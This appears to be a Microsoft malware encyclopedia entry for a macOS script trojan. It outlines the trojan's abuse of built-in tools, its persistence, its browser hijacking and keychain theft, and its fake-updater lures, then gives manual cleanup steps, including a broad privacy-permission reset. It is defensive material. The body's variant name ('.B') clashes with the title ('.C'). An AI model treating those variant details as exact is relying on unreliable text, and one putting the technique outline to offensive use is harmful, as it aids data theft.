We're gradually updating threat actor names in our reports to align with the new weather-themed taxonomy. Learn about Microsoft threat actor names
Trojan:MacOS/SuspMalScript.C
Aliases: No associated aliases
Summary
Trojan:MacOS/SuspMalScript.C is a sophisticated malicious script that targets macOS. It does this by leveraging built-in administrative tools and scripting interpreters. SuspMalScript is characterized by its "living-off-the-land" (LOLBin) approach, which uses macOS utilities such as curl, osascript, launchctl, and openssl to perform unauthorized actions. By avoiding the use of traditional Mach-O binaries in its initial stages, it reduces its visibility to signature-based antivirus engines.
The primary objective of SuspMalScript.B is the installation of persistent backdoors or the delivery of secondary payloads. These payloads are used to hijack web browser sessions, inject unauthorized advertisements, and exfiltrate sensitive user data, including browser history and keychain items. The distribution of this trojan is often achieved through social engineering, where users are prompted to download and launch what appears to be a legitimate software update, most commonly a fake Adobe Flash Player installer or a "codec" required to view premium video content.
The impact of an infection is multi-layered. Beyond the immediate performance degradation caused by high-intensity background scripts, it compromises the integrity of the user's web browsing experience and creates a foothold for more damaging attacks, such as ransomware or credential harvesting. The modular nature of the script allows the threat actors to update the command-and-control (C2) infrastructure and payload URLs dynamically, making the threat highly resilient to static blocking measures.
- Disconnect the affected Mac from the internet to stop data exfiltration and prevent further commands from being received.
- Restart the Mac in Safe Mode to deactivate automatic loading of user-installed LaunchAgents and break the malware persistence cycle.
- Delete persistence files. Open Terminal and carefully inspect ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons for suspicious .plist files. Use the command launchctl unload /path/to/file.plist before deleting the file.
- Check and clean device configuration files. Examine the /etc/hosts file for malicious redirects and review shell startup files (.bash_profile, .zshrc) for injected commands.
- Reset privacy permissions using the Terminal command tccutil reset All. Be aware this will require you to re-grant access to legitimate applications for features like screen recording.
- Use a reputable, updated macOS security tool to perform a full system scan and remove any remaining payloads or artifacts that manual cleaning might have missed.
Microsoft Defender Antivirus automatically removes threats as they are detected. However, many infections can leave remnant files and system changes. Updating your antimalware definitions and running a full scan might help address these remnant artifacts.
You can also visit our advanced troubleshooting page or search the Microsoft virus and malware community for more help.
